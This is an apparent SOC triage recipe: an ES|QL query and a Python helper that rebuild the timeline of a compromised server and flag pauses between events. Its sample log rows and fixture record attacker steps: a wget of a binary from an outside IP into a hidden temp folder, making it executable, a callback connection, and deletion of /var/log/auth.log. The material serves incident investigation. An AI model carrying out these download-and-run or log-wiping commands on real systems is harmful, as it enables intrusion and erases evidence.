Triage timeline of a compromised host
Multi-category chronological reconstruction (auth, process, network, files) over an incident window, with a unified detail field built via COALESCE so the attack can be read end to end.
Use case
First hour of an investigation: unroll the exact sequence of actions on the affected machine.
Prerequisites
Elasticsearch 8.12+, multi-source ECS logs
SQL
FROM "logs-*"
| WHERE host.name == "srv-app-02"
  AND @timestamp >= "2026-06-10T02:00:00Z"
  AND @timestamp < "2026-06-10T04:30:00Z"
  AND event.category IN ("authentication", "process", "network", "file")
| EVAL detail = COALESCE(
    process.command_line,
    file.path,
    CONCAT(TO_STRING(destination.ip), ":", TO_STRING(destination.port)),
    event.action)
| KEEP @timestamp, event.category, event.action, user.name, detail
| SORT @timestamp ASC
| LIMIT 200
Result
@timestamp               | event.category | event.action | user.name | detail
-------------------------+----------------+--------------+-----------+----------------------------------------
2026-06-10T02:07:14.220Z | authentication | ssh-login    | deploy    | ssh-login
2026-06-10T02:08:02.114Z | process        | exec         | deploy    | sudo su -
2026-06-10T02:09:41.872Z | process        | exec         | root      | wget hxxp://198.51.100.23/agent.bin
2026-06-10T02:09:58.330Z | file           | creation     | root      | /tmp/.cache/agent.bin
2026-06-10T02:10:03.001Z | process        | exec         | root      | chmod +x /tmp/.cache/agent.bin
2026-06-10T02:10:11.448Z | network        | connection   | root      | 198.51.100.23:443
2026-06-10T02:41:09.112Z | file           | deletion     | root      | /var/log/auth.log
2026-06-10T03:55:37.604Z | network        | connection   | root      | 10.2.0.14:5432
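Added example, not code from the original page: it parameterises the same query for any host and window (casting destination.ip, since ES|QL CONCAT only accepts string arguments) and post-processes the JSON the /_query endpoint returns to flag long pauses between consecutive events, which in the result above separate the initial access, the log deletion and the later database connection. The 15-minute threshold and the sample response are constructed assumptions.

```python
# Added example (not from the original page): build the timeline query for any
# host/window, casting destination.ip because CONCAT only accepts strings, and
# post-process the ES|QL /_query JSON response to flag long pauses between events.
import re
from datetime import datetime, timedelta

def build_timeline_query(host: str, start: str, end: str, limit: int = 200) -> str:
    """Return the ES|QL query text; host is validated before interpolation."""
    if not re.fullmatch(r"[A-Za-z0-9._-]+", host):
        raise ValueError("unexpected characters in host.name")
    return f'''FROM "logs-*"
| WHERE host.name == "{host}"
  AND @timestamp >= "{start}"
  AND @timestamp < "{end}"
  AND event.category IN ("authentication", "process", "network", "file")
| EVAL detail = COALESCE(
    process.command_line,
    file.path,
    CONCAT(TO_STRING(destination.ip), ":", TO_STRING(destination.port)),
    event.action)
| KEEP @timestamp, event.category, event.action, user.name, detail
| SORT @timestamp ASC
| LIMIT {limit}'''

def flag_gaps(response: dict, threshold: timedelta = timedelta(minutes=15)) -> list:
    """Zip columns/values into dicts; add gap_s since the previous event and flagged."""
    cols = [c["name"] for c in response["columns"]]
    out, prev = [], None
    for values in response["values"]:
        row = dict(zip(cols, values))
        ts = datetime.fromisoformat(row["@timestamp"].replace("Z", "+00:00"))
        gap = (ts - prev).total_seconds() if prev else 0.0
        out.append({**row, "gap_s": gap, "flagged": gap > threshold.total_seconds()})
        prev = ts
    return out

SAMPLE_RESPONSE = {  # constructed; mirrors the page's result rows (hxxp:// kept as on the page)
    "columns": [{"name": n, "type": "keyword"} for n in
                ("@timestamp", "event.category", "event.action", "user.name", "detail")],
    "values": [
        ["2026-06-10T02:07:14.220Z", "authentication", "ssh-login", "deploy", "ssh-login"],
        ["2026-06-10T02:08:02.114Z", "process", "exec", "deploy", "sudo su -"],
        ["2026-06-10T02:09:41.872Z", "process", "exec", "root", "wget hxxp://198.51.100.23/agent.bin"],
        ["2026-06-10T02:09:58.330Z", "file", "creation", "root", "/tmp/.cache/agent.bin"],
        ["2026-06-10T02:10:03.001Z", "process", "exec", "root", "chmod +x /tmp/.cache/agent.bin"],
        ["2026-06-10T02:10:11.448Z", "network", "connection", "root", "198.51.100.23:443"],
        ["2026-06-10T02:41:09.112Z", "file", "deletion", "root", "/var/log/auth.log"],
        ["2026-06-10T03:55:37.604Z", "network", "connection", "root", "10.2.0.14:5432"],
    ],
}
```

Feed the real response of POST /_query (format json) to flag_gaps to get the same annotated rows for a live case.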
SOC, Investigation, Timeline, Triage